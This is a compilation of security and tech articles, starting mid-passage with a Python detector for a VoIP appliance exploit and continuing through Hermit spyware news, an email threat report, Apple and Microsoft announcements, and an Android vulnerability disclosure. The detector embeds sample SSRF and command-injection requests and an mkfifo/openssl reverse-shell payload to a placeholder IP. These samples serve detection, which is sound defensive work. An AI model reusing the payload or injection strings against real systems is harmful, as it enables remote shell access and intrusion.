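URL_PARAMS = {"get_url"}
COMMAND_PARAMS = {"cmd"}
# Named pipe fed to sh, output sent through openssl s_client or netcat and
# written back into the same pipe.
FIFO_SHELL_RE = re.compile(
    r'mkfifo\s+(?P<fifo>[^\s;|&]+).*?(?:/bin/)?\b(?:sh|bash)\b.*?<\s*(?P=fifo).*?'
    r'(?:openssl\s+s_client|\b(?:nc|ncat|netcat)\b).*?>\s*(?P=fifo)',
    re.DOTALL,
)


def _is_loopback(host):
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # hostnames and the article's invalid placeholder IPs
        return host is not None and host.lower() == "localhost"


def _is_internal_host(host):
    """Loopback, private, link-local or unspecified address, or a localhost name."""
    if host is None:
        return False
    if host.lower() in ("localhost", "localhost.localdomain"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified


def inspect_target(target, findings, depth=0):
    """Record findings for a request target, descending into URL-valued params."""
    parts = urlsplit(target)
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if key in COMMAND_PARAMS and SHELL_META_RE.search(value):
                findings.append(f"shell_metachars:{key}")
            if key in URL_PARAMS:
                inner = urlsplit(value)
                if _is_internal_host(inner.hostname):
                    findings.append(f"ssrf_to_internal_host:{inner.hostname}")
                if depth < 3:  # the fetched URL may itself carry the injection
                    inspect_target(value, findings, depth + 1)
    return findings


def analyze_log_line(line):
    """Return finding tags for one access-log line; [] means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed_line"]
    findings = []
    if _is_loopback(m.group("src")):
        findings.append("source_is_loopback")  # localhost-only page reached via SSRF
    inspect_target(m.group("target"), findings)
    return findings


def looks_like_fifo_reverse_shell(text):
    """True if a command string or response body has the mkfifo reverse-shell shape."""
    return FIFO_SHELL_RE.search(text) is not None


# Constructed samples adapted from the article's quoted log lines and payload.
REQ1 = ('1.1.256.1 - - [01/Mar/2022:01:25:17 -TZ] "GET /scripts/vtest.php?get_url='
        'http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/'
        '%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40')
REQ2 = ('127.0.0.1 - - [01/Mar/2022:01:25:17 -TZ]  "GET /ucbsync.php?cmd=syncfile:'
        'db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -')
BENIGN = '10.0.0.5 - - [01/Mar/2022:01:30:00 -TZ] "GET /ucbsync.php?cmd=manifest HTTP/1.1" 200 512'
PAYLOAD = ("mkfifo /tmp/.svc_bkp_1; /bin/sh -i < /tmp/.svc_bkp_1 2>&1 | "
           "openssl s_client -quiet -connect 2.2.256.2:443 > /tmp/.svc_bkp_1; rm /tmp/.svc_bkp_1")

if __name__ == "__main__":
    for line in (REQ1, REQ2, BENIGN):
        print(analyze_log_line(line) or "clean", "<-", line[:60])
    print("reverse shell payload:", looks_like_fifo_reverse_shell(PAYLOAD))
```

Run over the two quoted requests, the first is tagged both for the loopback SSRF and for the injected cmd inside the URL it asks the appliance to fetch, and the second is tagged for a loopback source hitting the cmd page with pipe characters; the manifest request is clean. The pipe check keys on structure (same FIFO name on both ends of the shell) rather than on the specific path or port, so renaming /tmp/.svc_bkp_1 does not evade it.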

Post-Exploitation Activity

Once the reverse shell was established, the threat actor created what appeared to be a webshell named pdf_import.php. The contents of pdf_import.php were not recovered; however, it was not a standard file name for the device, and a recovered log file included a POST request to the file that originated from the same IP address that the exploit requests originated from.

1.1.256.1 - - [1/Mar/2022:06:36:04 -0500] "POST /vhelp/pdf/pdf_import.php HTTP/1.1" 200 2

The threat actor also downloaded the tunneling/proxy tool Chisel onto the VOIP appliance, renamed it memdump and executed it. This binary acted as a reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device. The execution of Chisel, as well as the POST request to pdf_import.php, both directly corresponded with malicious activity detected and blocked by Falcon Complete on internal devices, suggesting that the threat actor used both tools to attempt to move laterally into the environment.

Conclusion

Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant. That’s why it’s crucial to have multiple layers of defense, such as Falcon Complete MDR, which performs threat monitoring and remediation of malicious activity 24/7. Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via “one hop” from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements. 

Having an up-to-date and accurate asset inventory is also critically important, as you can’t protect something if you don’t know it exists. In addition, it’s important to ensure all service accounts are managed and accounted for, and that the capability exists to detect abnormal account usage. CrowdStrike Falcon Identity Protection can provide such insight by alerting on stale account usage as well as when accounts are associated with abnormal source or destination systems — and even forcing MFA challenges for users accessing critical assets.

Endnotes

  1. Linux command to remove files or directories
  2. Linux command to convert and copy files
  3. Linux command to spawn a shell or terminal prompt

Additional Resources

Google Says ISPs Helped Attackers Infect Targeted Smartphones with Hermit Spyware

A week after it emerged that a sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices.

Additionally, necessary changes have been implemented in Google Play Protect — Android’s built-in malware defense service — to protect all users, Benoit Sevens and Clement Lecigne of Google Threat Analysis Group (TAG) said in a Thursday report.

Hermit, the work of an Italian vendor named RCS Lab, was documented by Lookout last week, calling out its modular feature-set and its abilities to harvest sensitive information such as call logs, contacts, photos, precise location, and SMS messages.

Once the threat has thoroughly insinuated itself into a device, it’s also equipped to record audio and make and redirect phone calls, in addition to abusing its permissions to accessibility services to keep tabs on the foreground apps used by the victims.

Its modularity also enables it to be wholly customizable, equipping the spyware’s functionality to be extended or altered at will. It’s not immediately clear who were targeted in the campaign, or which of RCS Lab clients were involved.

The Milan-based company, operating since 1993, claims to provide “law enforcement agencies worldwide with cutting-edge technological solutions and technical support in the field of lawful interception for more than twenty years.” More than 10,000 intercepted targets are purported to be handled daily in Europe alone.

“Hermit is yet another example of a digital weapon being used to target civilians and their mobile devices, and the data collected by the malicious parties involved will surely be invaluable,” Richard Melick, director of threat reporting for Zimperium, said.

The targets’ phones were infected with the spy tool via drive-by downloads as the initial infection vector: a unique link is sent in an SMS message that, once clicked, activates the attack chain.

It’s suspected that the actors worked in collaboration with the targets’ internet service providers (ISPs) to disable their mobile data connectivity, followed by sending an SMS that urged the recipients to install an application to restore mobile data access.

“We believe this is the reason why most of the applications masqueraded as mobile carrier applications,” the researchers said. “When ISP involvement is not possible, applications are masqueraded as messaging applications.”

To compromise iOS users, the adversary is said to have relied on provisioning profiles that allow fake carrier-branded apps to be sideloaded onto the devices without the need for them to be available on the App Store.

An analysis of the iOS version of the app shows that it leverages as many as six exploits — CVE-2018-4344, CVE-2019-8605, CVE-2020-3837, CVE-2020-9907, CVE-2021-30883, and CVE-2021-30983 — to exfiltrate files of interest, such as WhatsApp databases, from the device.

“As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too,” Google Project Zero’s Ian Beer said in a deep-dive analysis of an iOS artifact that impersonated the My Vodafone carrier app.

On Android, the drive-by attacks require that victims enable a setting to install third-party applications from unknown sources; once installed, the rogue app, masquerading as an app from a smartphone brand like Samsung, requests extensive permissions to achieve its malicious goals.

The Android variant, besides attempting to root the device for entrenched access, is also wired differently in that instead of bundling exploits in the APK file, it contains functionality that permits it to fetch and execute arbitrary remote components that can communicate with the main app.

“This campaign is a good reminder that attackers do not always use exploits to achieve the permissions they need,” the researchers noted. “Basic infection vectors and drive by downloads still work and can be very efficient with the help from local ISPs.”

Stating that seven of the nine zero-day exploits it discovered in 2021 were developed by commercial providers and sold to and used by government-backed actors, the tech behemoth said it’s tracking more than 30 vendors with varying levels of sophistication who are known to trade exploits and surveillance capabilities.

What’s more, Google TAG raised concerns that vendors like RCS Lab are “stockpiling zero-day vulnerabilities in secret” and cautioned that this poses severe risks considering a number of spyware vendors have been compromised over the past ten years, “raising the specter that their stockpiles can be released publicly without warning.”

“Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits,” TAG said.

“While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians.”

Source :
https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html

Trend Micro Cloud App Security Threat Report 2021

In this report, we highlight the notable email threats of 2021, including over 33.6 million high-risk email threats (representing a 101% increase from 2020’s numbers) that we’ve detected using the Trend Micro Cloud App Security platform.

Email is an integral cog in the digital transformation machine. This was especially true in 2021, when organizations found themselves trying to keep business operations afloat in the middle of a pandemic that has forever changed how people work. At a time when the workplace had already largely shifted from offices to homes, malicious actors continued to favor email as a low-effort yet high-impact attack vector to disseminate malware.

Email is not only popular among cybercriminals for its simplicity but also for its efficacy. In fact, 74.1% of the total threats blocked by Trend Micro in 2021 were email threats. Meanwhile, the 2021 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3) states that there was “an unprecedented increase in cyberattacks and malicious cyber activity” last year, with business email compromise (BEC) being among the top incidents.

In this report, we discuss the notable email threats of 2021 based on the data that we’ve gathered using the Trend Micro™ Cloud App Security™, a security solution that supplements the preexisting security features in email and collaboration platforms.

Malware detections surge as attacks become more elaborate, targeted

The Trend Micro Cloud App Security solution detected and thwarted a total of 3,315,539 total malware files in 2021. More urgently, this number represents an increase of a whopping 196% from 2020’s numbers. There were also huge spikes in both known and unknown malware detections in 2021 at 133.8% and 221%, respectively.

Cybercriminals worked overtime to attach malware in malicious emails in 2021 using advanced tactics and social engineering lures. In January, we saw how Emotet sent spam emails that used hexadecimal and octal representations of IP addresses for detection evasion in its delivery of malware such as TrickBot and Cobalt Strike.

In May last year, we reported on Panda Stealer, an information stealer that targets cryptocurrency wallets and credentials via spam emails. We also shared an update on APT-C-36 (aka Blind Eagle), an advanced persistent threat (APT) group targeting South American entities using a spam campaign that used fraudulent emails impersonating Colombia’s national directorate of taxes and customs and even fake infidelity email lures.

QAKBOT operators also resumed their spam campaign in late 2021 after an almost three-month hiatus and abused hijacked email threads to lead victims to both QAKBOT and the SquirrelWaffle malware loader.

Meanwhile, ransomware detections continued to decline in 2021, a consistent trend that we have been seeing in previous years. Last year, the Trend Micro Cloud App Security solution detected and blocked 101,215 ransomware files — a 43.4% decrease compared to 2020’s detections.

The reason behind this continuing decline is possibly two-fold. One, unlike legacy ransomware that focused on the quantity of victims, modern ransomware focuses on waging highly targeted and planned attacks to yield bigger profits. Since today’s ransomware actors no longer abide by the spray-and-pray ransomware model, the number of attacks is no longer as massive as the number we witnessed in ransomware’s early days. We identified the other reason in our year-end roundup report: it’s possible that ransomware detections are down because our cybersecurity solutions continue to block an increasing number of ransomware affiliate tools each year, including TrickBot and BazarLoader. This could have prevented ransomware attacks from being successfully executed on victim environments.

Known, unknown, and overall credential phishing attacks rose in 2021

Based on Trend Micro Cloud App Security data, 6,299,883 credential phishing attacks were detected and blocked in 2021, which accounts for a 15.2% overall increase. Similar to last year, the number of known credential phishing attacks is greater than the unknown ones. However, this year, the percentage of increase is at a staggering 72.8%.

When comparing 2020 and 2021’s numbers, we saw an 8.4% increase in the number of detections for known credential phishing links, while a 30% growth is observed in the number of detections for unknown credential phishing links.

Abnormal Security noted the increase in overall credential phishing attacks in one 2021 report and stated that credential phishing is attributed to 73% of all advanced threats that they’ve analyzed.

We have also documented the rise in credential phishing attacks from previous years. In fact, in the first half of 2019, the Trend Micro Cloud App Security solution detected and blocked 2.4 million credential phishing attacks alone.

BEC’s small numbers bring big business losses

The Trend Micro Cloud App Security solution intercepted a total of 283,859 BEC attacks in 2021. Compared with 2020’s BEC detections, this number represents a 10.61% decrease. Interestingly, there is an 82.7% increase in this year’s BEC attacks that were detected using Writing Style DNA, while there is a 38.59% decrease in attacks that have been blocked using the antispam engine.

Overall, BEC numbers have consistently been on a downward trend since 2020. But the reduction in BEC victims doesn’t equate to a dip in cybercriminal profits. According to the FBI’s IC3, BEC accounted for US$2.4 billion in adjusted losses for both businesses and consumers in 2021. According to the same organization, BEC losses have reached over US$43 billion between June 2016 and December 2021 for both domestic and international incidents.

We have also observed how BEC actors continuously tweak their tactics for ill gain. In August last year, our telemetry showed a gradual increase in BEC detections. Upon investigation, we discovered that instead of impersonating company executives and upper management personnel, this BEC-related email campaign impersonated and targeted ordinary employees for money transfers and bank payroll account changes.

Covid-19 lures, cybercriminal campaigns behind massive jump in phishing numbers

The Trend Micro Cloud App Security solution data shows that a total of 16,451,166 phishing attacks were detected and blocked in 2021. This is a 137.6% growth from 2020’s phishing numbers.

In contrast to last year’s numbers, we saw a significant jump in phishing attacks detected via spam count this year — a whopping 596% increase, to be specific. Meanwhile, we observed a notable 15.26% increase in credential phishing count compared to last year.

These high numbers reflect organizations’ sentiments about phishing attacks. According to a survey in an Osterman Research report titled “How to Reduce the Risk of Phishing and Ransomware,” organizations were “concerned” or “extremely concerned” about phishing attempts making their way to end users and employees failing to spot phishing and social engineering attacks before accessing a link or attachment.

While cybercriminals kicked off the majority of Covid-19-related phishing emails and sites in 2020, they still exploited the global pandemic for financial gain in 2021. Last year, Mexico-based medical laboratory El Chopo shared that a fraudulent website that looked identical to the company’s had been launched. On that website, users could schedule a vaccination appointment after paying MXN2,700 (approximately US$130). To make the fake website appear credible, the malicious actors behind it added fake contact information such as email addresses and social media pages that victims could use for inquiries.

Early last year, we reported on a wave of phishing emails that pretended to be coming from national postal systems. This campaign attempted to steal credit card numbers from 26 countries. We also investigated a spear-phishing campaign that used Pegasus spyware-related emails to lead victims into downloading a file stealer. This campaign targeted high-ranking political leaders, activists, and journalists in 11 countries.

Protect emails, endpoints, and cloud-based services and apps from attacks with Trend Micro Cloud App Security

Organizations should consider a comprehensive multilayered security solution such as Trend Micro Cloud App Security. It supplements the preexisting security features in email and collaboration platforms like Microsoft 365 and Google Workspace (formerly known as G Suite) by using machine learning (ML) to analyze and detect any suspicious content in the message body and attachments of an email. It also acts as a second layer of protection after emails and files have passed through Microsoft 365 or Gmail’s built-in security.

Trend Micro Cloud App Security uses technologies such as sandbox malware analysis, document exploit detection, and file, email, and web reputation technologies to detect malware hidden in Microsoft 365 or PDF documents. It provides data loss prevention (DLP) and advanced malware protection for Box, Dropbox, Google Drive, SharePoint Online, OneDrive for Business, and Salesforce while also enabling consistent DLP policies across multiple cloud-based applications. It also offers seamless integration with an organization’s existing cloud setup, preserving full user and administrator functionality, providing direct cloud-to-cloud integration through vendor APIs, and minimizing the need for additional resources by assessing threat risks before sandbox malware analysis.

Trend Micro Cloud App Security stands on the cutting edge of email and software-as-a-service (SaaS) security, offering ML-powered features that combat two of the primary email-based threats: BEC and credential phishing. Writing Style DNA can help determine if an email is legitimate by using ML to check a user’s writing style based on past emails and then comparing suspicious emails against it. Computer vision, on the other hand, combines image analysis and ML to check branded elements, login forms, and other site content. It then pools this information with site reputation elements and optical character recognition (OCR) to check for fake and malicious sites — all while reducing instances of false positives to detect credential phishing email.

This security solution also comes with an option to rescan historical URLs in users’ email metadata and perform continued remediation (automatically taking configured actions or restoring quarantined messages) using newer patterns updated by Web Reputation Services.

This is a significant option since users’ email metadata might include undetected suspicious or dangerous URLs that have only recently been discovered. The examination of such metadata is thus an important part of forensic investigations that help determine if your email service has been affected by attacks. This solution also officially supports the Time-of-Click Protection feature to protect Exchange Online users against potential risks when they access URLs in incoming email messages.

Trend Micro Cloud App Security also comes with the advanced and extended security capabilities of Trend Micro XDR, providing investigation, detection, and response across your endpoints, email, and servers.

Source :
https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/trend-micro-cloud-app-security-threat-report-2021

macOS Ventura adds powerful productivity tools and new Continuity features that make the Mac experience better than ever

CUPERTINO, CALIFORNIA Apple today previewed macOS Ventura, the latest version of the world’s most advanced desktop operating system, which takes the Mac experience to a whole new level. Stage Manager gives Mac users an all-new way to stay focused on the task in front of them while seamlessly switching between apps and windows. Continuity Camera uses iPhone as the webcam on Mac to do things that were never possible before,1 and with Handoff coming to FaceTime, users can start a FaceTime call on their iPhone or iPad and fluidly pass it over to their Mac. Mail and Messages come with great new features that make the apps better than ever, while Safari — the world’s fastest browser on Mac2 — ushers in a passwordless future with passkeys. And with the power and popularity of Apple silicon, and new developer tools in Metal 3, gaming on Mac has never been better.

“macOS Ventura includes powerful features and new innovations that help make the Mac experience even better. New tools like Stage Manager make focusing on tasks and moving between apps and windows easier and faster than ever, and Continuity Camera brings new videoconferencing features to any Mac, including Desk View, Studio Light, and more,” said Craig Federighi, Apple’s senior vice president of Software Engineering. “With helpful new features in Messages, state-of-the-art search technologies in Mail, and an updated design for Spotlight, Ventura has so much to offer and enriches many of the ways customers use their Macs.”

A New Way to Work Across Apps and Windows

Stage Manager automatically organises open apps and windows so users can concentrate on their work and still see everything in a single glance. The current window users are working in is displayed prominently in the center, and other open windows appear on the left-hand side so they can quickly and easily switch between tasks. Users can also group windows together when working on specific tasks or projects that require different apps. Stage Manager works in concert with other macOS windowing tools — including Mission Control and Spaces — and users can now easily get to their desktop with a single click.

Apple Devices Working Together with Continuity

Continuity Camera now gives Mac customers the ability to use their iPhone as a webcam, and unlocks new capabilities that were never possible before on a webcam. With the power of Continuity, Mac can automatically recognise and use the camera on iPhone when it is nearby — without the need to wake or select it — and iPhone can even connect to Mac wirelessly for greater flexibility.3 Continuity Camera delivers innovative features to all Mac computers including Center Stage, Portrait mode, and the new Studio Light — an effect that beautifully illuminates a user’s face while dimming the background. Plus, Continuity Camera taps into the Ultra Wide camera on iPhone to enable Desk View, which simultaneously shows the user’s face and an overhead view of their desk — great for creating DIY videos, showing off sketches over FaceTime, and so much more.4

Handoff now comes to FaceTime, allowing users to start a FaceTime call on one Apple device and seamlessly transfer it to another Apple device nearby. Users can be on a FaceTime call on iPhone or iPad, then move the call to their Mac with just a click, or start a call on their Mac and shift to iPhone or iPad when they need to continue on the go.

Powerful Updates to Key macOS Apps and Features

Safari offers the fastest and most power-efficient browsing experience on the Mac, along with trailblazing privacy features. In macOS Ventura, Safari introduces a powerful new way for users to browse together: With shared Tab Groups, friends, family, and colleagues can share their favorite sites in Safari and see what tabs others are looking at live. Users can also build a list of bookmarks on a shared Start Page, and even start a Messages conversation or FaceTime call right from Safari — great for planning a trip or researching a project together.

In the biggest overhaul to search in years, Mail now uses state-of-the-art techniques to deliver more relevant, accurate, and complete results. Users can quickly find what they are looking for as soon as they click into search, including recent emails, contacts, documents, photos, and more, all before they even start typing. Users can also schedule emails and even cancel delivery after hitting send,5 and Mail now intelligently detects if items such as an attachment or cc’d recipient is missing from their message. In Mail, users can set reminders to come back to a message at a particular date and time, and receive automatic suggestions to follow up on an email if there has been no response.

Messages on the Mac now includes the ability to edit or undo a recently sent message, mark a message as unread, or even recover accidentally deleted messages.6 New collaboration features make working with others quick and seamless. Now, when a user shares a file via Messages using the share sheet or drag and drop, they can choose to share a copy or collaborate. When they choose to collaborate, everyone on a Messages thread is automatically added. And when someone makes an edit to the shared document, activity updates appear at the top of the thread. Users can also join SharePlay sessions from their Mac right in Messages, so they can chat and participate in synchronised experiences.

Spotlight includes an updated design that makes navigation easier, new features that provide a more consistent experience across Apple devices, and Quick Look for quickly previewing files. Users can now find images in their photo library, across the system, and on the web. They can even search for their photos by location, people, scenes, or objects, and Live Text lets them search by text inside images. To be even more productive, users can now take actions from Spotlight, like starting a timer, creating a new document, or running a shortcut. And Spotlight now includes rich results for artists, movies, actors, and TV shows, as well as businesses and sports.

With iCloud Shared Photo Library, users can now create and share a separate photo library among up to six family members, so everyone can enjoy all of their family photos. Users can choose to share all of their existing photos from their personal libraries, or share based on a start date or people in the photos. To help keep their Shared Library up to date, users will receive intelligent suggestions to share relevant photo moments that include participants in the library and any other people they choose. Every user in the Shared Photo Library can add, delete, edit, or favorite the shared photos and videos, which will appear in each user’s Memories and Featured Photos so that everyone can relive more complete family moments.

More Secure Browsing in Safari

Browsing in Safari is even safer with passkeys, next-generation credentials that are more secure, easy to use, and designed to replace passwords. Passkeys are unique digital keys that stay on device and are never stored on a web server, so hackers can’t leak them or trick users into sharing them. Passkeys make it simple to sign in securely, using Touch ID or Face ID for biometric verification, and iCloud Keychain to sync across Mac, iPhone, iPad, and Apple TV with end-to-end encryption. They will also work across apps and the web, and users can even sign in to websites or apps on non-Apple devices using their iPhone.

Immersive Gaming Experiences

The power of Apple silicon enables every new Mac to run AAA games with ease, including upcoming titles such as EA’s GRID Legends and Capcom’s Resident Evil Village. And since Apple silicon also powers iPad, game developers can bring their AAA games to even more users, like No Man’s Sky from Hello Games, which is coming to both Mac and iPad later this year. 

Metal 3, the latest version of the software that powers the gaming experience across Apple platforms, introduces new features that take the gaming experience on Mac to new heights and unleash the full potential of Apple silicon for years to come. MetalFX Upscaling enables developers to quickly render complex scenes by using less compute-intensive frames, and then apply resolution scaling and temporal anti-aliasing. The result is accelerated performance that provides gamers with a more responsive feel and graphics that look stunning. Game developers also benefit from a new Fast Resource Loading API that minimizes wait time by providing a more direct path from storage to the GPU, so games can easily access high-quality textures and geometry needed to create expansive worlds for realistic and immersive gameplay.

More Great Experiences Coming with macOS Ventura

  • Live Text uses on-device intelligence to recognise text in images across the system, and now adds support for paused video frames, as well as Japanese and Korean text. Users can also now lift the subject away from an image and drop it into another app. And Visual Look Up expands its recognition capabilities to now include animals, birds, insects, statues, and even more landmarks.
  • The Weather and Clock apps, with all the features users know and love from iPhone, have been optimized for Mac.
  • New accessibility tools include Live Captions for all audio content, Type to Speak on calls, Text Checker to support proofreading for VoiceOver users, and more.7
  • System Settings is the new name for System Preferences, and comes with a refreshed and streamlined design that is easier to navigate and instantly familiar to iPhone and iPad users.
  • macOS security gets even stronger with new tools that make the Mac more resistant to attack, including Rapid Security Response that works in between normal updates to easily keep security up to date without a reboot.

MacBook Air, the 24-inch iMac, and the new MacBook Pro.

Availability

The developer beta of macOS Ventura is available to Apple Developer Program members at developer.apple.com starting today. A public beta will be available to Mac users next month at beta.apple.com. macOS Ventura will be available this fall as a free software update. For more information, including compatible Mac models, visit apple.com/in/macos/macos-ventura-preview. Features are subject to change. Some features may not be available in all regions or languages.

Source :
https://www.apple.com/in/newsroom/2022/06/macos-ventura-brings-powerful-productivity-tools-new-continuity-features-to-mac/

Expansion of FIDO standard and new updates for Microsoft passwordless solutions

Howdy folks, 

Happy World Password Day! Today, I’m super excited to share some great news with you: Together, with the FIDO Alliance and other major platforms, Microsoft has announced support for the expansion of a common passwordless standard created by the FIDO Alliance and the World Wide Web consortium. These multi-device FIDO credentials, sometimes referred to as passkeys, represent a monumental step toward a world without passwords. We also have some great updates coming to our passwordless solutions in Azure Active Directory (Azure AD) and Windows that will expand passwordless to more use cases. 

Passwords have never been less adequate for protecting our digital lives. As Vasu Jakkal reported earlier today, there are over 921 password attacks every second. Lots of attackers want your password and will keep trying to steal it from you. It’s better for everyone if we just cut off their supply. 

Replacing passwords with passkeys 

Passkeys are a safer, faster, easier replacement for your password. With passkeys, you can sign in to any supported website or application by simply verifying your face, fingerprint or using a device PIN. Passkeys are fast, phish-resistant, and will be supported across leading devices and platforms. Your biometric information never leaves the device and passkeys can even be synced across devices on the same platform – so you don’t need to enroll each device and you’re protected in case you upgrade or lose your device. You can use Windows Hello today to sign in to any site that supports passkeys, and in the near future, you’ll be able to sign in to your Microsoft account with a passkey from an Apple or Google device.  

We enthusiastically encourage website owners and app developers to join Microsoft, Apple, Google, and the FIDO Alliance to support passkeys and help realize our vision of a truly passwordless world.  


Going passwordless 

We’re proud to have been one of the earliest supporters of the FIDO standards, including FIDO2 certification for Windows Hello. We’re thrilled to evolve the FIDO standards ecosystem to support passkeys and that passwordless authentication continues to gain momentum. 

Since we started introducing passwordless sign-in nearly 5 years ago, the number of people across Microsoft services signing in each month without using their password has reached more than 240 million. And in the last six months, over 330,000 people have taken the next step of removing the password from their Microsoft Account. After all, you’re completely safe from password-based attacks if you don’t have one. 

Today, we’re also announcing new capabilities that will make it easier for enterprises to go completely passwordless: 

Passwordless for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure 

Now that remote or hybrid work is the new norm, lots more people are using a remote or virtualized desktop to get their work done. And now, we’ve added passwordless support for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure. This is currently in preview with Windows 11 Insiders, and is on the way for Windows 10 as well.  

Windows Hello for Business Cloud Trust  

Windows Hello for Business Cloud Trust simplifies the deployment experience of Windows Hello for hybrid environments. This new deployment model removes previous requirements for public key infrastructure (PKI) and syncing public keys between Azure AD and on-premises domain controllers. This improvement eliminates delays between users provisioning Windows Hello for Business and being able to authenticate and makes it easier than ever to use Windows Hello for Business for accessing on-premises resources and applications. Cloud Trust is now available in preview for Windows 10 21H2 and Windows 11 21H2. 

Multiple passwordless accounts in Microsoft Authenticator 

When we first introduced passwordless sign-in for Azure AD (work or school accounts), Microsoft Authenticator could only support one passwordless account at a time. Now that limitation has been removed and you can have as many as you want. iOS users will start to see this capability later this month and the feature will be available on Android afterwards.  

Passwordless phone sign-in experience in Microsoft Authenticator for Azure AD accounts.

Temporary Access Pass in Azure AD 

Temporary Access Pass in Azure AD, a time-limited passcode, has been a huge hit with enterprises since the public preview, and we’ve been adding more ways to use it as we prepare to release the feature this summer. Lots of customers have told us they want to distribute Temporary Access Passes instead of passwords for setting up new Windows devices. You’ll be able to use a Temporary Access Pass to sign in for the first time, to configure Windows Hello, and to join a device to Azure AD. This update will be available next month. 

End user experience for Temporary Access Pass in Windows 11 onboarding.

Customers implementing passwordless today 

We already have several great examples of large Microsoft customers implementing passwordless solutions, including Avanade, who went passwordless with help from Feitian to protect their clients’ data against security breaches. Amedisys, a home healthcare and hospice care provider, went passwordless to keep patient personal information secured. Both organizations are committed to using passwordless authentication not only to strengthen security, but also to make the sign-in experience easier for end users. 

We’d love to hear your feedback, so please leave a comment, check out the documentation, and visit aka.ms/gopasswordless for more information. 

Best regards,  

Alex Simons (Twitter: @Alex_A_Simons)

Corporate Vice President of Program Management 

Microsoft Identity Division 

Source :
https://techcommunity.microsoft.com/t5/azure-active-directory-identity/expansion-of-fido-standard-and-new-updates-for-microsoft/ba-p/3290633

Android apps with millions of downloads exposed to high-severity vulnerabilities

Microsoft uncovered high-severity vulnerabilities in a mobile framework owned by mce Systems and used by multiple large mobile service providers in pre-installed Android System apps that potentially exposed users to remote (albeit complex) or local attacks. The vulnerabilities, which affected apps with millions of downloads, have been fixed by all involved parties. Coupled with the extensive system privileges that pre-installed apps have, these vulnerabilities could have been attack vectors for attackers to access system configuration and sensitive information.

As with many of the pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device. We worked with mce Systems, the developer of the framework, and the affected mobile service providers to solve these issues. We commend the quick and professional resolution from the mce Systems engineering teams, as well as the relevant providers, in fixing each of these issues, ensuring that users can continue using such a crucial framework.

Collaboration among security researchers, software vendors, and the security community is important to continuously improve defenses for the larger ecosystem. As the threat and computing landscape continues to evolve, vulnerability discoveries, coordinated response, and other forms of threat intelligence sharing are paramount to protecting customers against present and future threats, regardless of the platform or device they are using.

Uncovering the vulnerabilities

Our research on the framework vulnerabilities began while trying to better understand how a pre-installed System application could affect the overall security of mobile devices. We discovered that the framework, which is used by numerous apps, had a “BROWSABLE” service activity that an attacker could remotely invoke to exploit several vulnerabilities that could allow adversaries to implant a persistent backdoor or take substantial control over the device.

The framework seemed to be designed to offer self-diagnostic mechanisms to identify and resolve issues impacting the Android device, indicating its permissions were inherently broad with access to valuable resources. For example, the framework was authorized to access system resources and perform system-related tasks, like adjusting the device’s audio, camera, power, and storage controls. Moreover, we found that the framework was being used by default system applications to leverage its self-diagnostic capabilities, demonstrating that the affiliated apps also included extensive device privileges that could be exploited via the vulnerable framework.

According to mce Systems, some of these vulnerabilities also affected other apps on both Android and iOS devices. Moreover, the vulnerable framework and affiliated apps were found on devices from large international mobile service providers. mce Systems, which offers “Mobile Device Lifecycle and Automation Technologies,” also permitted providers to customize and brand their respective mobile apps and frameworks. Pre-installed frameworks and mobile apps such as mce Systems’ are beneficial to users and providers in areas like simplifying the device activation process, troubleshooting device issues, and optimizing performance. However, their extensive control over the device to deliver these kinds of services could also make them an attractive target for attackers. 

Our analysis further found that the apps were embedded in the devices’ system image, suggesting that they were default applications installed by phone providers. All of the apps are available on the Google Play Store where they go through Google Play Protect’s automatic safety checks, but these checks previously did not scan for these types of issues. As part of our effort to help ensure broad protection against these issues, we shared our research with Google, and Google Play Protect now identifies these types of vulnerabilities.

We initially discovered the vulnerabilities in September 2021 and shared our findings with mce Systems and affected mobile service providers through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). We worked closely with mce Systems’ security and engineering teams to mitigate these vulnerabilities, which included mce Systems sending an urgent framework update to the impacted providers and releasing fixes for the issues. At the time of publication, there have been no reported signs of these vulnerabilities being exploited in the wild.

The high-severity vulnerabilities, which have a Common Vulnerability Scoring System (CVSS) score of 7.0-8.9, are now identified as CVE-2021-42598, CVE-2021-42599, CVE-2021-42600, and CVE-2021-42601. We want to thank mce Systems’ engineering teams for collaborating quickly and efficiently in resolving these issues as well as to AT&T for proactively working with Microsoft to ensure customers can safely continue to use the framework.

Several other mobile service providers were found using the vulnerable framework with their respective apps, suggesting that there could be additional providers still undiscovered that may be impacted. The affected providers linked below have made updated app versions available to users before this disclosure, ensuring devices can be protected before these vulnerabilities could be exploited. We encourage these providers’ customers to update to the latest versions of these apps from the Google Play store, which include but are not limited to: com.telus.checkup, com.att.dh, com.fivemobile.myaccount, com.freedom.mlp,uat, and com.ca.bell.contenttransfer.

